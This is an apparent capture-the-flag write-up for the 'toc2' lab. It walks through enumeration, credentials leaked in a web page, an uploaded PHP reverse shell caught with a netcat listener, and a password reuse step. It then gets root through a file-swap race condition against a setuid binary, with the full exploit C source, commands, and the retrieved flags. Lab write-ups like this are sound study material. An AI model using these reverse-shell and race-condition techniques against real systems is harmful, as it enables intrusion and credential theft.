toc2 (cms made simple 2.1.6 exploit + linux .c program race condition)

https://github.com/sroettger/35c3ctf_chals/blob/master/logrotate/exploit/rename.c

https://www.youtube.com/watch?v=5g137gsB9Wk

Find and retrieve the user.txt flag

Services

Nmap reveals 2 open ports:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 84:4e:b1:49:31:22:94:84:83:97:91:72:cb:23:33:36 (RSA)
|   256 cc:32:19:3f:f5:b9:a4:d5:ac:32:0f:6e:f0:83:35:71 (ECDSA)
|_  256 bd:d8:00:be:49:b5:15:af:bf:d5:85:f7:3a:ab:d6:48 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/cmsms/cmsms-2.1.6-install.php
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site Maintenance
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

CMS information

Connecting to the web service’s default page reveals credentials: cmsmsuser:devpass:

┌──(kali㉿kali)-[/data/toc2]
└─$ curl -s http://10.10.215.10/                

<!doctype html>
<title>Site Maintenance</title>
<style>
  body { text-align: center; padding: 150px; }
  h1 { font-size: 50px; }
  body { font: 20px Helvetica, sans-serif; color: #333; }
  article { display: block; text-align: left; width: 650px; margin: 0 auto; }
  a { color: #dc8100; text-decoration: none; }
  a:hover { color: #333; text-decoration: none; }
</style>

<article>
    <h1>Under Construction!</h1>
    <div>
        <p>Sorry for the inconvenience but management have once again asked for more than we can deliver. </p>
        
        <p>The web server isn't going to be ready for the web dev team to build on for another few days. Just in case anyone around here except me wants to do anything: cmsmsuser:devpass </p>
        <p>&mdash; Hunter</p>
    </div>
</article>

Besides, there is also a robots.txt file that discloses the name of a database, as well as a CMS installation URL (CMS Made Simple):

┌──(kali㉿kali)-[/data/toc2]
└─$ curl -s http://10.10.215.10/robots.txt 
User-agent: *
Disallow: /cmsms/cmsms-2.1.6-install.php
 
Note to self:
Tommorow, finish setting up the CMS, and that database, cmsmsdb, so the site's ready by Wednesday.

Running Gobuster won’t reveal other locations. At this stage, here is the information collected so far:

URL: http://10.10.215.10/cmsms/cmsms-2.1.6-install.php
DB: cmsmsdb
Username: cmsmsuser
Password: devpass

CMS Made Simple / Reverse Shell

Let’s proceed with the installation of CMS Made Simple, as we have the setup PHP file.

Complete the installation and login to the admin panel. Then go to the file manager and upload a PHP reverse shell.

Start a listener (nc -nlvp 4444) and browse 10.10.215.10/cmsms/uploads/shell.php.

We now have a reverse shell:

┌──(kali㉿kali)-[/data/toc2/files]
└─$ nc -nlvp 4444       
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.215.10] 34964
Linux toc 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 11:51:53 up 18 min,  0 users,  load average: 1.08, 1.71, 1.47
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

User flag

The user flag is located in frank’s home:

www-data@toc:/home/frank$ cat user.txt 
cat user.txt
thm{63616d70657276616e206c696665}

Escalate your privileges and acquire root.txt

Lateral move (www-data -> frank)

There is a note left in frank’s home folder, disclosing frank’s password: password.

www-data@toc:/home/frank$ cat new_machine.txt
cat new_machine.txt
I'm gonna be switching computer after I get this web server setup done. The inventory team sent me a new Thinkpad, the password is "password". It's funny that the default password for all the work machines is something so simple...Hell I should probably change this one from it, ah well. I'm switching machines soon- it can wait.

Let’s connect as frank:

www-data@toc:/home/frank/root_access$ su frank
su frank
Password: password

frank@toc:~/root_access$ id
id
uid=1000(frank) gid=1000(frank) groups=1000(frank),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd)

The readcreds binary

There is an interesting folder called root_access in frank’s home:

frank@toc:~/root_access$ ll
ll
total 28
drwxr-xr-x 2 frank frank 4096 Jan 31 17:29 ./
drwxr-xr-x 5 frank frank 4096 Aug 18  2020 ../
-rwsr-xr-x 1 root  root  8704 Jan 31 17:29 readcreds*
-rw-r--r-- 1 root  root   656 Jan 31 12:44 readcreds.c
-rw------- 1 root  root    34 Aug 23  2020 root_password_backup

The sources of the readcreds binary are provided:

frank@toc:~/root_access$ cat readcreds.c
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <fcntl.h>
#include <errno.h>
#include <stdlib.h>

int main(int argc, char* argv[]) {
    int file_data; char buffer[256]; int size = 0;

    if(argc != 2) {
      printf("Binary to output the contents of credentials file \n ./readcreds [file] \n"); 
      exit(1);
    }

    if (!access(argv[1],R_OK)) {
      sleep(1);
      file_data = open(argv[1], O_RDONLY);
    } else {
      fprintf(stderr, "Cannot open %s \n", argv[1]);
      exit(1);
    }

    do {
        size = read(file_data, buffer, 256);
        write(1, buffer, size);
    } 
    
    while(size>0);

}

Race condition

Providing the root_password_backup file to the readcreds binary will show an error, as the file is owned by root. However, we can run a race condition attack.

Download rename.c. The source of the program is shown below:

#define _GNU_SOURCE
#include <stdio.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <linux/fs.h>

// source https://github.com/sroettger/35c3ctf_chals/blob/master/logrotate/exploit/rename.c
int main(int argc, char *argv[]) {
  while (1) {
    syscall(SYS_renameat2, AT_FDCWD, argv[1], AT_FDCWD, argv[2], RENAME_EXCHANGE);
  }
  return 0;
}

Compile the program (gcc rename.c -o rename), create a pwd file and run the rename binary as follows:

frank@toc:~/root_access$ touch pwd
frank@toc:~/root_access$ ./rename pwd root_password_backup

Now in another session:

www-data@toc:/home/frank/root_access$ ./readcreds root_password_backup
./readcreds root_password_backup
Root Credentials:  root:aloevera

Root flag

We can now log in as root and read the root flag:

www-data@toc:/home/frank/root_access$ su - root
su - root
Password: aloevera

root@toc:~# cat /root/root.txt
cat /root/root.txt
thm{7265616c6c696665}

PreviousWWBuddy (SQLi new way + php cmd injection + USER env var privesc)NextVulnNet Active (Windows Redis + SMB scheduled job + SharpGPOAbuse)

Last updated 2 years ago